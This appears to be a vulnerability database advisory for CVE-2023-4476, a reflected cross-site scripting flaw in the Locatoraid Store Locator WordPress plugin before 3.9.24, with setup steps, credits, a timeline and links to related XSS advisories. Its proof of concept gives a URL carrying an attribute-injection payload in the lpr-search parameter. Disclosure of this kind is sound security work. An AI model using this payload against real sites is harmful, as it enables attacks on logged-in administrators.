Locatoraid Store Locator < 3.9.24 – Reflected XSS | CVE 2023-4476 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the lpr-search parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

Setup (as admin):
- Locatoraid > Configuration > Google Maps > Enter "none" at Google Maps Browser API Key and Save
- Locatoraid > Publish > Add New (Pages with block) > Insert Shortcode [locatoraid] and Publish
- Go to Appearance > Widgets > Add block Locatoraid Search Form to Footer Area

Attack (as unauthenticated)
Open or make a logged in user open the following URL: http://example.com/?lpr-search="onfocus=alert(/XSS/) autofocus "

Affects Plugins

Fixed in 3.9.24

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dao Xuan Hieu

Submitter

Dao Xuan Hieu

Verified

Yes

WPVDB ID

3ca22b22-fe89-42be-94ec-b164838bcf50

Timeline

Publicly Published

2023-08-28 (about 8 months ago)

Added

2023-08-30 (about 8 months ago)

Last Updated

2023-08-30 (about 8 months ago)

Other

Published

Title

Published

2024-03-18

Title

Better Search < 3.3.1 - Unauthenticated Stored Cross-Site Scripting

Published

2024-01-26

Title

Mang Board WP < 1.7.8 - Admin+ Stored XSS

Published

2021-01-12

Title

Orbit Fox by ThemeIsle < 2.10.3 - Authenticated Stored Cross Site Scripting

Published

2020-08-19

Title

Elegant Testimonial <= 1.1.6 - Multiple Authenticated Stored Cross-Site Scripting

Published

2021-06-28

Title

W3 Total Cache < 2.1.4 - Reflected XSS in Extensions Page (Attribute Context)